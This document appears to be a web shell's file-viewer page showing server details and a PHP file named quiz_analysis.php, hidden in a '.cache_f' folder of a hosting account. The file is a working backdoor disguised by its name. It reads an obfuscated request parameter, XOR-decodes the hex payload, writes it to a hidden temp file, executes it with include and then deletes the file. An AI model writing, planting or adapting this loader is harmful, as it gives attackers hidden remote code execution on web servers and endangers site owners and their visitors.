HEX
Server: LiteSpeed
System: Linux premium148.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: burhbrzf (1357)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /home/burhbrzf/public_html/.cache_f/quiz_analysis.php
<?php

if(@$_REQUEST["e\x6E\x74ry"] !== null){
	$record = hex2bin($_REQUEST["e\x6E\x74ry"]);
	$data_chunk='' ;$j = 0; while($j < strlen($record)){$data_chunk .= chr(ord($record[$j]) ^ 7);$j++;}
	$obj = array_filter(["/dev/shm", sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir"), getcwd()]);
	$token = 0;
do {
    $sym = $obj[$token] ?? null;
    if ($token >= count($obj)) break;
    		if (!!is_dir($sym) && !!is_writable($sym)) {
    $reference = "$sym" . "/.symbol";
    $success = file_put_contents($reference, $data_chunk);
if ($success) {
	include $reference;
	@unlink($reference);
	die();}
}
    $token++;
} while (true);
}